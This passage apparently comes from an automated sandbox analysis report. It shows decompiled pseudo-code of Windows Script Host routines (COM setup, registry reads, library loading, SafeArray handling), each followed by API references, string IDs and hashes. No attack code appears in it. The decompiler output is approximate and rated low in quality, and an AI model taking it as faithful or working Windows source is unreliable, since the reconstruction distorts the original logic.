					_t64 =  *((intOrPtr*)( *_t63 + 0x20))(_t63, L"WSH", 2);
					_t92 = _t64;
					if(_t64 < 0) {
						goto L15;
					}
					_t65 =  *_t74;
					_t66 =  *((intOrPtr*)( *_t65 + 0x14))(_t65, 5);
					_t92 = _t66;
					if(_t66 < 0) {
						goto L15;
					}
					_t68 =  *((intOrPtr*)(_a8 + 0x23));
					 *((char*)(_t93 + 0x50)) = _t68;
					if(_t68 != 0) {
						_t74 =  *_t74;
						_t32 = _t93 + 0x4c; // 0x4c
						_t70 =  *((intOrPtr*)( *_t74))(_t74, 0xb88bdc, _t32);
						_t92 = _t70;
						__eflags = _t92;
						if(_t92 < 0) {
							goto L15;
						}
					}
					 *0xb97018 =  *0xb97018 + 1;
					_t71 =  *0xb97018; // 0x0
					 *((intOrPtr*)(_t93 + 0x20)) = _t71;
					 *_v36 = _t93;
					_t93 = 0;
					_t92 = 0;
				}
			}






































                                                        0x00b851ed
                                                        0x00b851f4
                                                        0x00b851f7
                                                        0x00b851fb
                                                        0x00b85202
                                                        0x00b85204
                                                        0x00b85207
                                                        0x00b8520a
                                                        0x00b8520d
                                                        0x00b85213
                                                        0x00b85215
                                                        0x00b85365
                                                        0x00b8521b
                                                        0x00b85223
                                                        0x00b85223
                                                        0x00b85227
                                                        0x00b88ba0
                                                        0x00b8522d
                                                        0x00b85232
                                                        0x00b85235
                                                        0x00b8523a
                                                        0x00b8523e
                                                        0x00b8533d
                                                        0x00b8533d
                                                        0x00b85342
                                                        0x00b85347
                                                        0x00b85347
                                                        0x00b8534c
                                                        0x00b88bbf
                                                        0x00b88bc3
                                                        0x00b88bc5
                                                        0x00b88bcb
                                                        0x00b88bcb
                                                        0x00b88bd1
                                                        0x00000000
                                                        0x00b85352
                                                        0x00b85352
                                                        0x00b85362
                                                        0x00b85362
                                                        0x00b8534c
                                                        0x00b85247
                                                        0x00b8524a
                                                        0x00b8524f
                                                        0x00b85255
                                                        0x00b85259
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8526c
                                                        0x00b85270
                                                        0x00b85276
                                                        0x00b8527a
                                                        0x00000000
                                                        0x00000000
                                                        0x00b85280
                                                        0x00b85285
                                                        0x00b85285
                                                        0x00b8528f
                                                        0x00b85291
                                                        0x00b85295
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8529b
                                                        0x00b8529e
                                                        0x00b852a0
                                                        0x00b852aa
                                                        0x00b852ac
                                                        0x00b852b0
                                                        0x00000000
                                                        0x00000000
                                                        0x00b852b6
                                                        0x00b852bc
                                                        0x00b852bf
                                                        0x00b852c3
                                                        0x00000000
                                                        0x00000000
                                                        0x00b852c5
                                                        0x00b852cb
                                                        0x00b852d2
                                                        0x00b852d5
                                                        0x00b852d9
                                                        0x00000000
                                                        0x00000000
                                                        0x00b852db
                                                        0x00b852e7
                                                        0x00b852ea
                                                        0x00b852ee
                                                        0x00000000
                                                        0x00000000
                                                        0x00b852f0
                                                        0x00b852fc
                                                        0x00b852ff
                                                        0x00b85303
                                                        0x00000000
                                                        0x00000000
                                                        0x00b85305
                                                        0x00b8530c
                                                        0x00b8530f
                                                        0x00b85313
                                                        0x00000000
                                                        0x00000000
                                                        0x00b85318
                                                        0x00b8531b
                                                        0x00b85320
                                                        0x00b88baa
                                                        0x00b88bae
                                                        0x00b88bb8
                                                        0x00b8536c
                                                        0x00b8536e
                                                        0x00b85370
                                                        0x00000000
                                                        0x00000000
                                                        0x00b85372
                                                        0x00b85326
                                                        0x00b8532c
                                                        0x00b85331
                                                        0x00b85337
                                                        0x00b85339
                                                        0x00b8533b
                                                        0x00b8533b

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B8520D
                                                          • Part of subcall function 00B818C4: GetProcessHeap.KERNEL32(00000000,?), ref: 00B818E8
                                                          • Part of subcall function 00B818C4: HeapAlloc.KERNEL32(00000000), ref: 00B818EB
                                                        • CLSIDFromString.OLE32(74BA46CE,00000100), ref: 00B8524F
                                                        • CoCreateInstance.OLE32(00000100,00000000,00000017,00B815B8,00000000), ref: 00B85270
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Heap$??2@AllocCreateFromInstanceProcessString
                                                        • String ID: WSH$WScript
                                                        • API String ID: 829307797-1019903269
                                                        • Opcode ID: 1a3eb14eb4380b31dc8493c9d6f938fdf86b21b87f2ccc508d661451e4876022
                                                        • Instruction ID: 3a4e3f14b887fea3096500f1d505fde071482112c293d24776107155233a22ba
                                                        • Opcode Fuzzy Hash: 1a3eb14eb4380b31dc8493c9d6f938fdf86b21b87f2ccc508d661451e4876022
                                                        • Instruction Fuzzy Hash: BF519275600A059FC721EF68C895E9AB7F9FF88750B150898E956DB360EF71EC02CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 023114C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E023114C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x23b2088; // 0x77da46ae
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02307707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E023113CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02307707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02307707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E022D2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E022DE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                        0x023114c0
                                                        0x023114cb
                                                        0x023114d2
                                                        0x023114d6
                                                        0x023114da
                                                        0x023114de
                                                        0x023114e3
                                                        0x0231157a
                                                        0x0231157a
                                                        0x023114f1
                                                        0x023114f3
                                                        0x0233ea0f
                                                        0x00000000
                                                        0x0233ea15
                                                        0x00000000
                                                        0x0233ea15
                                                        0x023114f9
                                                        0x023114f9
                                                        0x023114fe
                                                        0x02311504
                                                        0x0233ea1a
                                                        0x0233ea1f
                                                        0x0233ea21
                                                        0x0233ea22
                                                        0x0233ea27
                                                        0x0233ea2a
                                                        0x0233ea2a
                                                        0x02311515
                                                        0x02311517
                                                        0x0231156d
                                                        0x02311572
                                                        0x02311575
                                                        0x02311575
                                                        0x0231151e
                                                        0x0233ea50
                                                        0x0233ea55
                                                        0x0233ea58
                                                        0x0233ea58
                                                        0x0231152e
                                                        0x02311531
                                                        0x02311533
                                                        0x00000000
                                                        0x02311535
                                                        0x02311541
                                                        0x02311549
                                                        0x02311549
                                                        0x02311533
                                                        0x023114f3
                                                        0x02311559

                                                        APIs
                                                        • ___swprintf_l.LIBCMT ref: 0233EA22
                                                          • Part of subcall function 023113CB: ___swprintf_l.LIBCMT ref: 0231146B
                                                          • Part of subcall function 023113CB: ___swprintf_l.LIBCMT ref: 02311490
                                                        • ___swprintf_l.LIBCMT ref: 0231156D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: 148958322b716580334a9901849d6e02883d7a3a84f2b2d3419beea50a07d715
                                                        • Instruction ID: a8c5dee8e56525c9e1d2409083013f1f0a677beff498e499dbbff1dfb4ae2fa5
                                                        • Opcode Fuzzy Hash: 148958322b716580334a9901849d6e02883d7a3a84f2b2d3419beea50a07d715
                                                        • Instruction Fuzzy Hash: 0F2193729102199BDB25DE98CC40AEAB3BDAF10704F444555FD8AD3144EB70EA588BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B83351, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00B83351(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t34;

				_t28 = __edx;
				_t27 = __ecx;
				_t30 = L"Software\\Microsoft\\Windows Script Host\\Settings";
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				E00B83415(__ecx, __edx, 0x80000001, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20019,  &_v12);
				E00B83415(__ecx, __edx, 0x80000002, _t30, 0x20019,  &_v8);
				_t19 = E00B83249(_t27, L"Enabled", _v12, _v8, 1);
				if(_t19 == 0) {
					_t20 =  *0xb9702c; // 0x0
					_t27 =  *0xb97010; // 0x0
					_t19 = E00B8F342(_t27, _t20 + 0x14, 0xc88);
					goto L3;
				} else {
					_t34 =  *0xb97001; // 0x0
					if(_t34 != 0) {
						__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
						L3:
						_v16 = _t19;
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				if(_v16 < 0) {
					_push(0xc89);
					_push(1);
				} else {
					_push(0xbee);
					_push(0);
				}
				E00B8386A(_t27, _t28);
				return _v16;
			}









                                                        0x00b83351
                                                        0x00b83351
                                                        0x00b83366
                                                        0x00b83373
                                                        0x00b83376
                                                        0x00b83379
                                                        0x00b8337c
                                                        0x00b8338c
                                                        0x00b8339e
                                                        0x00b833a5
                                                        0x00b883f4
                                                        0x00b883f9
                                                        0x00b88408
                                                        0x00000000
                                                        0x00b833ab
                                                        0x00b833ab
                                                        0x00b833b1
                                                        0x00b833be
                                                        0x00b833c4
                                                        0x00b833c4
                                                        0x00b833c4
                                                        0x00b833b1
                                                        0x00b833d0
                                                        0x00b833d5
                                                        0x00b833d5
                                                        0x00b833da
                                                        0x00b833df
                                                        0x00b833df
                                                        0x00b833e4
                                                        0x00b88412
                                                        0x00b88417
                                                        0x00b833ea
                                                        0x00b833ea
                                                        0x00b833ef
                                                        0x00b833ef
                                                        0x00b833f0
                                                        0x00b833fc

                                                        APIs
                                                          • Part of subcall function 00B83415: RegOpenKeyExW.ADVAPI32 ref: 00B83444
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00B833BE
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B833D5
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B833DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Close$InitializeOpenSecurity
                                                        • String ID: Enabled$Software\Microsoft\Windows Script Host\Settings
                                                        • API String ID: 2119996383-4294085457
                                                        • Opcode ID: 354042e1776468125571e82586582f74ec1aa38e13692174b2570788139cc024
                                                        • Instruction ID: 3ac04b8c4f5cc8fbbcba11eb2dae7b98bfe2064fa850731dd3cc0a9053a3df47
                                                        • Opcode Fuzzy Hash: 354042e1776468125571e82586582f74ec1aa38e13692174b2570788139cc024
                                                        • Instruction Fuzzy Hash: 31215E75D04208BBDB11AF959D82EAEBBFCEB04F54F1440AAB515B31A1CA714E41DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B837F5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E00B837F5() {
				signed int _t4;
				_Unknown_base(*)()* _t5;
				signed int _t8;
				signed int _t9;
				struct HINSTANCE__* _t11;
				void* _t13;

				_t9 = _t8 ^ _t8;
				_t13 =  *0xb97000 - _t9; // 0x0
				if(_t13 == 0) {
					return 1;
				} else {
					_t11 = LoadLibraryA("kernel32.dll");
					if(_t11 == _t9) {
						_t4 = 0;
					} else {
						_t5 = GetProcAddress(_t11, "HeapSetInformation");
						if(_t5 != _t9) {
							_t9 =  *_t5(_t9, 1, _t9, _t9);
						}
						FreeLibrary(_t11);
						_t4 = _t9;
					}
					return _t4;
				}
			}









                                                        0x00b837f8
                                                        0x00b837fa
                                                        0x00b83800
                                                        0x00b87f49
                                                        0x00b83806
                                                        0x00b83812
                                                        0x00b83816
                                                        0x00b87f4a
                                                        0x00b8381c
                                                        0x00b83822
                                                        0x00b8382a
                                                        0x00b83833
                                                        0x00b83833
                                                        0x00b83836
                                                        0x00b8383c
                                                        0x00b8383c
                                                        0x00b83840
                                                        0x00b83840

                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00B8380C
                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00B83822
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B83836
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: HeapSetInformation$kernel32.dll
                                                        • API String ID: 145871493-3597996958
                                                        • Opcode ID: 10cc0e52260035658fb3e9665cd08ee8a1e750ec9ba9f99d4efad9478f660987
                                                        • Instruction ID: 43d9cf00c8a0902e4da747cf79f1bc2db33e9d46c989ca5afde6d83828114c55
                                                        • Opcode Fuzzy Hash: 10cc0e52260035658fb3e9665cd08ee8a1e750ec9ba9f99d4efad9478f660987
                                                        • Instruction Fuzzy Hash: 6DE0927234A2D03FD7207BB41CC89665ACDE745B9632408B5F106D3170EA508D41D360
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B82F29, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E00B82F29(signed int _a4) {
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t10;

				_t10 = LoadLibraryW(L"kernel32.dll");
				if(_t10 != 0) {
					_t6 = GetProcAddress(_t10, "SetThreadUILanguage");
					if(_t6 != 0) {
						_a4 =  *_t6(_a4) & 0x0000ffff;
					}
					FreeLibrary(_t10);
				}
				return _a4;
			}





                                                        0x00b82f3a
                                                        0x00b82f3e
                                                        0x00b82f46
                                                        0x00b82f4e
                                                        0x00b82f58
                                                        0x00b82f58
                                                        0x00b82f5c
                                                        0x00b82f5c
                                                        0x00b82f68

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,00B82EDF,00000000), ref: 00B82F34
                                                        • GetProcAddress.KERNEL32(00000000,SetThreadUILanguage,?,00B82EDF,00000000), ref: 00B82F46
                                                        • FreeLibrary.KERNEL32(00000000,?,00B82EDF,00000000), ref: 00B82F5C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: SetThreadUILanguage$kernel32.dll
                                                        • API String ID: 145871493-927383962
                                                        • Opcode ID: 1cf8d99c3779383a567e2850cb72ede6a83205c9c33ade3253eac3e9628edee6
                                                        • Instruction ID: 05d9ca260f01367e0467ba0b302d0f792abdd60317f47d97554b84c3e55902a5
                                                        • Opcode Fuzzy Hash: 1cf8d99c3779383a567e2850cb72ede6a83205c9c33ade3253eac3e9628edee6
                                                        • Instruction Fuzzy Hash: 67E04F355422696B87112F55DC08AAA7EACEE557D27108061FE08D3174DB30C942C7E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8477C, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 26%
                                                        			E00B8477C(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v28;
				char _v36;
				signed int _t34;
				char* _t36;
				intOrPtr* _t42;
				signed int* _t44;
				signed int _t47;
				void* _t49;
				short _t50;
				void* _t54;
				signed int* _t55;
				intOrPtr* _t56;

				_push(0x28);
				L00B82877();
				_t47 = 0;
				if(__eax == 0) {
					_t56 = 0;
				} else {
					_t56 = E00B84873(__eax);
				}
				if(_t56 == _t47) {
					_t55 = 0x8007000e;
					goto L17;
				} else {
					_t34 = 0;
					_v8 = _t47;
					if(_a4 <= _t47) {
						L7:
						_v20 = _v8;
						_t36 =  &_v20;
						_v16 = _t47;
						__imp__#15(0xc, 1, _t36);
						 *((intOrPtr*)(_t56 + 0x24)) = _t36;
						if(_t36 == _t47) {
							L19:
							_t55 = 0x8007000e;
							L16:
							if(_t56 != 0) {
								 *((intOrPtr*)( *_t56 + 8))(_t56);
							}
							L17:
							return _t55;
						}
						_v12 = _t47;
						if(_a4 <= _t47) {
							L15:
							 *_a12 = _t56;
							_t56 = 0;
							_t55 = 0;
							goto L16;
						}
						while(_v12 < _v8) {
							_t42 =  *((intOrPtr*)(_a8 + _t47 * 4));
							_t49 = 0x2f;
							if(_t49 ==  *_t42) {
								L14:
								_t47 = _t47 + 1;
								if(_t47 < _a4) {
									continue;
								}
								goto L15;
							}
							_t50 = 8;
							_v36 = _t50;
							__imp__#2(_t42);
							_v28 = _t42;
							if(_t42 == 0) {
								goto L19;
							}
							_t44 =  &_v12;
							__imp__#26( *((intOrPtr*)(_t56 + 0x24)), _t44,  &_v36);
							_t55 = _t44;
							__imp__#9( &_v36);
							if(_t55 < 0) {
								goto L16;
							}
							_v12 = _v12 + 1;
							goto L14;
						}
						goto L15;
					} else {
						goto L4;
					}
					do {
						L4:
						_t54 = 0x2f;
						if(_t54 !=  *((intOrPtr*)( *((intOrPtr*)(_a8 + _t34 * 4))))) {
							_v8 = _v8 + 1;
						}
						_t34 = _t34 + 1;
					} while (_t34 < _a4);
					goto L7;
				}
			}



















                                                        0x00b84787
                                                        0x00b84789
                                                        0x00b8478e
                                                        0x00b84793
                                                        0x00b84860
                                                        0x00b84799
                                                        0x00b847a0
                                                        0x00b847a0
                                                        0x00b847a4
                                                        0x00b8923e
                                                        0x00000000
                                                        0x00b847aa
                                                        0x00b847aa
                                                        0x00b847af
                                                        0x00b847b2
                                                        0x00b847cb
                                                        0x00b847ce
                                                        0x00b847d1
                                                        0x00b847d9
                                                        0x00b847dc
                                                        0x00b847e2
                                                        0x00b847e7
                                                        0x00b84867
                                                        0x00b84867
                                                        0x00b8484f
                                                        0x00b84851
                                                        0x00b8924b
                                                        0x00b8924b
                                                        0x00b84857
                                                        0x00b8485d
                                                        0x00b8485d
                                                        0x00b847ec
                                                        0x00b847ef
                                                        0x00b84846
                                                        0x00b84849
                                                        0x00b8484b
                                                        0x00b8484d
                                                        0x00000000
                                                        0x00b8484d
                                                        0x00b847f1
                                                        0x00b847fc
                                                        0x00b84801
                                                        0x00b84805
                                                        0x00b84840
                                                        0x00b84840
                                                        0x00b84844
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b84844
                                                        0x00b84809
                                                        0x00b8480b
                                                        0x00b8480f
                                                        0x00b84815
                                                        0x00b8481a
                                                        0x00000000
                                                        0x00000000
                                                        0x00b84820
                                                        0x00b84827
                                                        0x00b8482d
                                                        0x00b84833
                                                        0x00b8483b
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8483d
                                                        0x00000000
                                                        0x00b8483d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b847b4
                                                        0x00b847b4
                                                        0x00b847bc
                                                        0x00b847c0
                                                        0x00b847c2
                                                        0x00b847c2
                                                        0x00b847c5
                                                        0x00b847c6
                                                        0x00000000
                                                        0x00b847b4

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B84789
                                                        • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00B847DC
                                                        • SysAllocString.OLEAUT32(FF85F88B), ref: 00B8480F
                                                        • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 00B84827
                                                        • VariantClear.OLEAUT32(?), ref: 00B84833
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ArraySafe$??2@AllocClearCreateElementStringVariant
                                                        • String ID:
                                                        • API String ID: 1438706513-0
                                                        • Opcode ID: 0c9dba47491affb6e2a3ab3d29dde74ec96dc54f007b27a13b1095dd2089c703
                                                        • Instruction ID: 7b056e826fa404230ddb1ab7a816228a697bee53f5ccfd6e4287bdf9d15ccddf
                                                        • Opcode Fuzzy Hash: 0c9dba47491affb6e2a3ab3d29dde74ec96dc54f007b27a13b1095dd2089c703
                                                        • Instruction Fuzzy Hash: 6D31437690025AEFCB10EFA5C8C4AAEB7F4FB44710F2445AAE901EB260D734DD81CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B84689, Relevance: 7.6, APIs: 5, Instructions: 97memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 40%
                                                        			E00B84689(void* __eax, void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v24;
				char _v32;
				void* __esi;
				char* _t31;
				short _t39;
				signed int _t40;
				signed int* _t42;
				void* _t46;
				intOrPtr _t47;
				signed int* _t51;
				intOrPtr _t52;
				intOrPtr* _t53;

				_t46 = __ebx;
				_push(0x4c);
				L00B82877();
				if(__eax == 0) {
					_t53 = 0;
				} else {
					_t53 = E00B83A08(__eax);
				}
				if(_t53 == 0) {
					_t51 = 0x8007000e;
					goto L13;
				} else {
					_t52 = _a4;
					_v12 = _v12 & 0x00000000;
					_t31 =  &_v16;
					_v16 = _t52;
					__imp__#15(0xc, 1, _t31);
					 *((intOrPtr*)(_t53 + 0x28)) = _t31;
					if(_t31 == 0) {
						_t51 = 0x8007000e;
						L12:
						if(_t53 != 0) {
							 *((intOrPtr*)( *_t53 + 8))(_t53);
						}
						L13:
						return _t51;
					}
					_v8 = _v8 & 0x00000000;
					_push(_t46);
					_t47 = _a8;
					if(_t52 <= 0) {
						L8:
						_t23 = _t53 + 0x2c; // 0x2c
						_t51 = E00B84931(_t23, _t53, _a4, _t47, _t23);
						if(_t51 >= 0) {
							_t25 = _t53 + 0x30; // 0x30
							_t51 = E00B8477C(_t25, _a4, _t47, _t25);
							if(_t51 >= 0) {
								 *_a12 = _t53;
								_t53 = 0;
								_t51 = 0;
							}
						}
						L11:
						goto L12;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t39 = 8;
						_v32 = _t39;
						_t40 = _v8;
						__imp__#2( *((intOrPtr*)(_t47 + _t40 * 4)));
						_v24 = _t40;
						if(_t40 == 0) {
							break;
						}
						_t42 =  &_v8;
						__imp__#26( *((intOrPtr*)(_t53 + 0x28)), _t42,  &_v32);
						_t51 = _t42;
						__imp__#9( &_v32);
						if(_t51 < 0) {
							goto L11;
						}
						_v8 = _v8 + 1;
						if(_v8 < _a4) {
							continue;
						}
						goto L8;
					}
					_t51 = 0x8007000e;
					goto L11;
				}
			}


















                                                        0x00b84689
                                                        0x00b84693
                                                        0x00b84695
                                                        0x00b8469d
                                                        0x00b84769
                                                        0x00b846a3
                                                        0x00b846aa
                                                        0x00b846aa
                                                        0x00b846ae
                                                        0x00b89253
                                                        0x00000000
                                                        0x00b846b4
                                                        0x00b846b4
                                                        0x00b846b7
                                                        0x00b846bb
                                                        0x00b846c3
                                                        0x00b846c6
                                                        0x00b846cc
                                                        0x00b846d1
                                                        0x00b8925d
                                                        0x00b84759
                                                        0x00b8475b
                                                        0x00b8926a
                                                        0x00b8926a
                                                        0x00b84761
                                                        0x00b84766
                                                        0x00b84766
                                                        0x00b846d7
                                                        0x00b846db
                                                        0x00b846dc
                                                        0x00b846e1
                                                        0x00b84729
                                                        0x00b84729
                                                        0x00b84736
                                                        0x00b8473a
                                                        0x00b8473c
                                                        0x00b84749
                                                        0x00b8474d
                                                        0x00b84752
                                                        0x00b84754
                                                        0x00b84756
                                                        0x00b84756
                                                        0x00b8474d
                                                        0x00b84758
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b846e3
                                                        0x00b846e3
                                                        0x00b846e5
                                                        0x00b846e6
                                                        0x00b846ea
                                                        0x00b846f0
                                                        0x00b846f6
                                                        0x00b846fb
                                                        0x00000000
                                                        0x00000000
                                                        0x00b84701
                                                        0x00b84708
                                                        0x00b8470e
                                                        0x00b84714
                                                        0x00b8471c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8471e
                                                        0x00b84727
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b84727
                                                        0x00b84770
                                                        0x00000000
                                                        0x00b84770

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B84695
                                                        • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00B846C6
                                                        • SysAllocString.OLEAUT32(?), ref: 00B846F0
                                                        • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 00B84708
                                                        • VariantClear.OLEAUT32(?), ref: 00B84714
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ArraySafe$??2@AllocClearCreateElementStringVariant
                                                        • String ID:
                                                        • API String ID: 1438706513-0
                                                        • Opcode ID: 55f32a343458b7407fe8bb578e604ca9f9f7ca630c374490cd34aaa8e6bcf4e8
                                                        • Instruction ID: 04d7041db8dde127cf6e9ef68fca060d4887ed0409380d7f63575326cfaf9f7e
                                                        • Opcode Fuzzy Hash: 55f32a343458b7407fe8bb578e604ca9f9f7ca630c374490cd34aaa8e6bcf4e8
                                                        • Instruction Fuzzy Hash: 2131957A90060AEBDB11EF94C844B6E77F9EF85750F264495E825DB220DB34DD41CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B86F4A, Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E00B86F4A(void* __fp0, intOrPtr _a4, signed char _a8) {
				signed char _v8;
				long long _v12;
				void* _v20;
				struct tagMSG _v48;
				signed char _t17;
				long _t19;
				long long _t43;

				_t40 = __fp0;
				if(_a8 < 0) {
					return 0x80070057;
				}
				_t17 = GetTickCount();
				_v8 = _t17;
				asm("fild dword [ebp-0x4]");
				if(_t17 < 0) {
					_t40 = __fp0 +  *0xb88f48;
				}
				asm("fst qword [ebp-0x10]");
				asm("fild dword [ebp+0xc]");
				_v12 = _t40 + st1;
				_t43 = _v12;
				asm("fcomp st0, st2");
				asm("fnstsw ax");
				st1 = _t43;
				while((_t17 & 0x00000041) == 0) {
					asm("fsubr qword [ebp-0x8]");
					_t19 = E00B87011();
					if(_t19 > 0x3e8) {
						_t19 = 0x3e8;
					}
					MsgWaitForMultipleObjects(0, 0, 1, _t19, 0x1ff);
					if(PeekMessageA( &_v48, 0, 0, 0, 1) != 0) {
						DispatchMessageA( &_v48);
					}
					if(E00B81D76( *((intOrPtr*)(_a4 + 0x40))) != 0) {
						L11:
						return 0;
					} else {
						_t17 = GetTickCount();
						_a8 = _t17;
						asm("fild dword [ebp+0xc]");
						if(_t17 < 0) {
						}
						asm("fcomp st0, st1");
						asm("fnstsw ax");
						if((_t17 & 0x00000041) == 0) {
						}
						_t43 = _v12;
						asm("fcomp st0, st1");
						asm("fnstsw ax");
						continue;
					}
				}
				st0 = _t43;
				goto L11;
			}










                                                        0x00b86f4a
                                                        0x00b86f58
                                                        0x00000000
                                                        0x00b88f05
